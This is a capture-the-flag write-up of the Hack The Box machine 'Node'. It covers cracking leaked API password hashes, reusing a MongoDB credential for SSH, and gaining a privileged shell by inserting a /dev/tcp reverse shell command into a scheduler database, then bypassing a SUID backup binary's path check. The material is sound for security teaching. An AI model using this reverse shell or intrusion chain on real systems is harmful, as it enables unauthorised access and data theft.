Node

tags: HTB Medium Linux OSCP

Enumeration

Nmap

To get started, we run a quick open ports scan.

# nmap -p- -T4 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:26 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 92.74 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 22,3000 10.10.10.58
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-25 19:27 CET
Nmap scan report for 10.10.10.58
Host is up (0.093s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info:
|_  Logs: /login
| hadoop-tasktracker-info:
|_  Logs: /login
|_http-title: MyPlace
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   93.86 ms 10.10.14.1
2   93.88 ms 10.10.10.58

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.28 seconds

Port 3000

In port 3000 we can find a web server and by analyzing the source code of the website, we can find several javascript resources.
Inside the admin.js file we can see that it is making a GET request to the URL /api/admin/backup.

var controllers = angular.module('controllers');

controllers.controller('AdminCtrl', function ($scope, $http, $location, $window) {
  $scope.backup = function () {
    $window.open('/api/admin/backup', '_self');
  }

  $http.get('/api/session')
    .then(function (res) {
      if (res.data.authenticated) {
        $scope.user = res.data.user;
      }
      else {
        $location.path('/login');
      }
    });
});

When accessing the URL we can find 3 user accounts with their respective hashes.

Using the website crackstation we can get the passwords for tom and mark in plain text.

tom:spongebob
mark:snowflake
rastating:Can’t decrypt it

On the other hand, inside the profile.js file we can find the URL api/users.

var controllers = angular.module('controllers');

controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
  $http.get('/api/users/' + $routeParams.username)
    .then(function (res) {
      $scope.user = res.data;
    }, function (res) {
      $scope.hasError = true;

      if (res.status == 404) {
        $scope.errorMessage = 'This user does not exist';
      }
      else {
        $scope.errorMessage = 'An unexpected error occurred';
      }
    });
});

And by accessing the URL api/users we can obtain the 3 previous accounts and a new one, that of the user myP14ceAdm1nAcc0uNT with its hash and who is also an administrator as we can see in the parameteris_admin: true.

And again we can get the password in plain text using the crackstation service.

myP14ceAdm1nAcc0uNT:manchester

Now that we have a user with administrator permissions, we are going to authenticate on the website.
As we can see, we can download a Backup file.

Let's see its content.

# cat myplace.backup | base64 -d > myplace
# file myplace
myplace: Zip archive data, at least v1.0 to extract
root [EvilBook] (10.10.14.7) ~/Descargas
# mv myplace myplace.zip

Exploitation

Fcrackzip

The zip file is password protected, but we can try to get it using fcrackzip.

# fcrackzip -D -p /usr/share/wordlists/rockyou.txt myplace.zip
possible pw found: magicword ()

Great, now we can extract the content.

# unzip myplace.zip
Archive:  myplace.zip
[myplace.zip] var/www/myplace/package-lock.json password:
  inflating: var/www/myplace/package-lock.json
   creating: var/www/myplace/node_modules/
   creating: var/www/myplace/node_modules/serve-static/
  inflating: var/www/myplace/node_modules/serve-static/README.md
.................................................................
.................................................................

The extracted content is a copy of the web application and analyzing its files, inside the app.js file in its first lines we can find the credentials formongodb of the user mark.

const url = 'mongodb://mark:[email protected]:27017/myplace?authMechanism=DEFAULT&authSource=myplace';

Maybe they will help us to connect by SSH.

SSH

And we are inside via SSH with the credentials mark:5AYRft73VtFpc84k found!

Post exploitation

SUID

Let's see what we have with the SUID bit set.

[email protected]:~$ find / -perm /4000 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/bin/mount

The /usr/local/bin/backup binary has SUID rights but we cannot execute it being mark.

Running process

Let's see what processes tom has running.

[email protected]:~$ ps -ef | grep tom
mark       612   596  0 07:43 pts/0    00:00:00 grep --color=auto tom
tom       1229     1  0 Mar25 ?        00:00:07 /usr/bin/node /var/scheduler/app.js
tom       1232     1  0 Mar25 ?        00:00:07 /usr/bin/node /var/www/myplace/app.js
tom      18349  1229  0 Mar25 ?        00:00:00 /bin/sh -c /bin/bash /tmp/shell.sh
tom      18350 18349  0 Mar25 ?        00:00:00 /bin/bash /tmp/shell.sh
tom      18351 18350  0 Mar25 ?        00:00:00 sh -i
tom      18356 18351  0 Mar25 ?        00:00:00 /bin/bash
tom      18358 18356  0 Mar25 ?        00:00:00 python3 -c import pty; pty.spawn('/bin/bash')
tom      18359 18358  0 Mar25 pts/2    00:00:00 /bin/bash

tom is running another application with Node called /var/scheduler/app.js. Let's see its content.

const exec        = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:[email protected]:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';

MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');
    return;
  }

  setInterval(function () {
    db.collection('tasks').find().toArray(function (error, docs) {
      if (!error && docs) {
        docs.forEach(function (doc) {
          if (doc) {
            console.log('Executing task ' + doc._id + '...');
            exec(doc.cmd);
            db.collection('tasks').deleteOne({ _id: new ObjectID(doc._id) });
          }
        });
      }
      else if (error) {
        console.log('Something went wrong: ' + error);
      }
    });
  }, 30000);

});

Well, as we see in the code, there is a function that lists all the records of the table tasks of the database scheduler of mongodb and executes with the function exec() the content of the corresponding record with the cmd column, also as we can see, has an interval of 30000 configured so that every 30 seconds it performs this process again.

We should be able to connect to the database and insert a new record with a command to run a reverse shell that we have saved in a script.

Privilege escalation

Well, the first thing we need to do is put a terminal to listen and create the script with the reverse shell inside.

[email protected]:/tmp$ cat shell.sh
sh -i >& /dev/tcp/10.10.14.7/8787 0>&1

Now, we have to connect to the scheduler database and insert a new record that executes our script. Inserting {cmd:"/bin/bash /tmp/shell.sh"} should work.

[email protected]:/home/tom$ mongo localhost:27017/scheduler -u mark -p 5AYRft73VtFpc84k
MongoDB shell version: 3.2.16
connecting to: localhost:27017/scheduler
> sh -i >& /dev/tcp/10.10.14.7/8787 0>&1
2021-03-25T19:45:26.389+0000 E QUERY    [thread1] SyntaxError: expected expression, got '&' @(shell):1:7

> db.tasks.find()
> db.tasks.insert({cmd:"/bin/bash /tmp/shell.sh"});
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("605ce5e877be912640c6765d"), "cmd" : "/bin/bash /tmp/shell.sh" }
>

We just have to wait a few seconds... and we have a shell!

# nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.58] 32886
sh: 0: can't access tty; job control turned off
$

Perfect, now we can read the user flag inside the tom home.

[email protected]:~$ cat user.txt
CENSORED_FLAG

Root flag

Now that we are tom, we can run the SUID backup we found earlier.

As we can see in the app.js file downloaded in the backup of the website, the execution syntax of the binary is /usr/local/bin/backup followed by -q key and the path to perform the backup.

app.get('/api/admin/backup', function (req, res) {
    if (req.session.user && req.session.user.is_admin) {
      var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);
      var backup = '';

      proc.on("exit", function(exitCode) {
        res.header("Content-Type", "text/plain");
        res.header("Content-Disposition", "attachment; filename=myplace.backup");
        res.send(backup);
      });

      proc.stdout.on("data", function(chunk) {
        backup += chunk;
      });

      proc.stdout.on("end", function() {
      });
    }
    else {
      res.send({
        authenticated: false
      });
    }
  });

Well, we are going to ask you to make a backup of the root directory. We must remember that the result will be a zip file in base64.

[email protected]:~$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "/root"
 [+] Finished! Encoded backup is below:

UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==

Let's decode it.

# echo "UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==" | base64 -d > root.zip

In this case, unzip is not working so we are going to use 7za. The password to unzip is magicword which is the same as we cracked earlier.

# 7za x root.zip

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.utf8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i5-8250U CPU @ 1.60GHz (806EA),ASM,AES-NI)

Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)

Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141

Enter password (will not be echoed):
Everything is Ok

Size:       2584
Compressed: 1141

When unzipping it, we obtain the file root.txt, we are going to read the flag.

# cat root.txt
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQQQQQWQQQQQWWWBBBHHHHHHHHHBWWWQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' [email protected]?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ [email protected]'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
QW [email protected] jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,[email protected]  "[email protected]?$:.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ
QQQQQQQQQQQQQQQQQQQQQQWWQQga,-"9$WQQmmwwmBUUHTTVWBWQQQQWVT?96aQWQQQ ]QQQQQQ
QQQQQQQQQQWQQQQWQQQQQQQQQQQWQQma,-?9$QQWWQQQQQQQWmQmmmmmQWQQQQWQQW(.yQQQQQW
QQQQQQQQQQQQQWQQQQQQWQQQQQQQQQQQQQga%,.  -??9$QQQQQQQQQQQWQQWQQV? sWQQQQQQQ
QQQQQQQQQWQQQQQQQQQQQQQQWQQQQQQQQQQQWQQQQmywaa,;~^"!???????!^`_saQWWQQQQQQQ
QQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQQWWWWQQQQQmwywwwwwwmQQWQQQQQQQQQQQ
QQQQQQQWQQQWQQQQQQWQQQWQQQQQWQQQQQQQQQQQQQQQQWQQQQQWQQQWWWQQQQQQQQQQQQQQQWQ

Wow, we've been trolled!

Let's analyze the flow of the program with ltrace.

[email protected]:/$ ltrace /usr/local/bin/backup -q 45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474 /root
__libc_start_main(0x80489fd, 4, 0xffea6174, 0x80492c0 <unfinished ...>
geteuid()                                                                                                                                        = 1000
setuid(1000)                                                                                                                                     = 0
strcmp("-q", "-q")                                                                                                                               = 0
strncpy(0xffea6038, "45fac180e9eee72f4fd2d9386ea7033e"..., 100)                                                                                  = 0xffea6038
strcpy(0xffea6021, "/")                                                                                                                          = 0xffea6021
strcpy(0xffea602d, "/")                                                                                                                          = 0xffea602d
strcpy(0xffea5fb7, "/e")                                                                                                                         = 0xffea5fb7
strcat("/e", "tc")                                                                                                                               = "/etc"
strcat("/etc", "/m")                                                                                                                             = "/etc/m"
strcat("/etc/m", "yp")                                                                                                                           = "/etc/myp"
strcat("/etc/myp", "la")                                                                                                                         = "/etc/mypla"
strcat("/etc/mypla", "ce")                                                                                                                       = "/etc/myplace"
strcat("/etc/myplace", "/k")                                                                                                                     = "/etc/myplace/k"
strcat("/etc/myplace/k", "ey")                                                                                                                   = "/etc/myplace/key"
strcat("/etc/myplace/key", "s")                                                                                                                  = "/etc/myplace/keys"
fopen("/etc/myplace/keys", "r")                                                                                                                  = 0x95e7008
fgets("a01a6aa5aaf1d7729f35c8278daae30f"..., 1000, 0x95e7008)                                                                                    = 0xffea5bcf
strcspn("a01a6aa5aaf1d7729f35c8278daae30f"..., "\n")                                                                                             = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "a01a6aa5aaf1d7729f35c8278daae30f"...)                                                             = -1
fgets("45fac180e9eee72f4fd2d9386ea7033e"..., 1000, 0x95e7008)                                                                                    = 0xffea5bcf
strcspn("45fac180e9eee72f4fd2d9386ea7033e"..., "\n")                                                                                             = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "45fac180e9eee72f4fd2d9386ea7033e"...)                                                             = 0
fgets("3de811f4ab2b7543eaf45df611c2dd25"..., 1000, 0x95e7008)                                                                                    = 0xffea5bcf
strcspn("3de811f4ab2b7543eaf45df611c2dd25"..., "\n")                                                                                             = 64
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "3de811f4ab2b7543eaf45df611c2dd25"...)                                                             = 1
fgets("\n", 1000, 0x95e7008)                                                                                                                     = 0xffea5bcf
strcspn("\n", "\n")                                                                                                                              = 0
strcmp("45fac180e9eee72f4fd2d9386ea7033e"..., "")                                                                                                = 1
fgets(nil, 1000, 0x95e7008)                                                                                                                      = 0
strstr("/root", "..")                                                                                                                            = nil
strstr("/root", "/root")                                                                                                                         = "/root"
strcpy(0xffea4c08, "Finished! Encoded backup is belo"...)                                                                                        = 0xffea4c08
printf(" %s[+]%s %s\n", "\033[32m", "\033[37m", "Finished! Encoded backup is belo"... [+] Finished! Encoded backup is below:

)                                                           = 51
puts("UEsDBDMDAQBjAG++IksAAAAA7QMAABgK"...UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
)                                                                                                      = 1525
exit(0 <no return ...>
+++ exited (status 0) +++
[email protected]:/$

So the binary is comparing that the requested path is /root as we can see here strstr("/root", "/root"). Nothing happens ... we can solve it by assigning in the environment variables that the HOME of tom is /root and thus we can request the binary to backup the tom home.

[email protected]:/$ export HOME=/root
[email protected]:/$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "~"
$ /usr/local/bin/backup -q "45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474" "~"
UEsDBAoAAAAAABwWO0sAAAAAAAAAAAAAAAAFABwAcm9vdC9VVAkAA4cDy1mn8FxgdXgLAAEEAAAAAAQAAAAAUEsDBBQACQAIANGDEUd/sK5kgwAAAJQAAAANABwAcm9vdC8ucHJvZmlsZVVUCQADGf7RVafwXGB1eAsAAQQAAAAABAAAAAAqqI3TrmsV+iDiA6QOgcmk55oSaOqGnmlXqXZ+ahOZbgV8qrPj39LuSt3KPACjZrW9Xp6TWBgX8rtVNtt4f9HavJjvH6S53XJSZB/rJnz24O/I5iX+xNbWqod/UYtnSGXJegEJXqmkbVUz/OgH2+/9q1z7kKW1mkoReRfEik99g2zUsVBLBwh/sK5kgwAAAJQAAABQSwMEFAAJAAgAHBY7S9xSZRxNAAAAVQAAABIAHAByb290Ly5iYXNoX2hpc3RvcnlVVAkAA4cDy1mn8FxgdXgLAAEEAAAAAAQAAAAAnS4NpNmo5WmOhsAByMNIrVq6qCCA3sl64viNCoGt4JM0/Nt744Tz+gJSnzyrcJaYadaQnPb/CuHCCjZ4Dw1B/5/7InCiRFEwdBiIz4xQSwcI3FJlHE0AAABVAAAAUEsDBAoAAAAAADR8I0sAAAAAAAAAAAAAAAAMABwAcm9vdC8uY2FjaGUvVVQJAAPDEqxZp/BcYHV4CwABBAAAAAAEAAAAAFBLAwQKAAkAAAA0fCNLAAAAAAwAAAAAAAAAIAAcAHJvb3QvLmNhY2hlL21vdGQubGVnYWwtZGlzcGxheWVkVVQJAAPDEqxZp/BcYHV4CwABBAAAAAAEAAAAAD/HBIzeaYfQgRw/ulBLBwgAAAAADAAAAAAAAABQSwMECgAJAAAA1H0jS/KON0AtAAAAIQAAAA0AHAByb290L3Jvb3QudHh0VVQJAAPQFaxZp/BcYHV4CwABBAAAAAAEAAAAAE38VXQwB0DnuzHbP8jPsNkHNUgfZ6V/S+EcccNOJyJIAQnSwacvQUiUOQxfTVBLBwjyjjdALQAAACEAAABQSwMEFAAJAAgA65FWR73lED6bBQAAIgwAAAwAHAByb290Ly5iYXNocmNVVAkAA6kZKVan8FxgdXgLAAEEAAAAAAQAAAAA9pQQS9gMKo5SCQjLDtSbizUZnLcF8g0Hi5sHa2Phi/GWTh6AQAL6vFf/tEU9sQKubKsF95ejMcS908g4aeQIobyWWnyYLzy3xadAOyoux2OidmdtAKEkx36XznEas/IuCx90GhI9qvIei/taAkp9RNVTfxN4Y0eVcyIznu0N7eREcrcO4Y65Qcc8kuIG3S8NQreHhFLBHxMQwNWGtPUsdfTr2ougr1OZ0gSyLv3f7BqemSg17TPgLnUx7DMKSeBCF3siixjAP9s0H3pfnNZhPZHPdQ/n+6whZdSXNNTemyc+yRZCLLvIcwbx3WM0vSIXH4VqlW7EO/aXOUTYBApoR7w//MDvE+asrPlHhPsI+yr5i5gqSxBIToIXfxAkCvVUcYs4WqUaeLvFkH90pBWThlNXWAn2Q+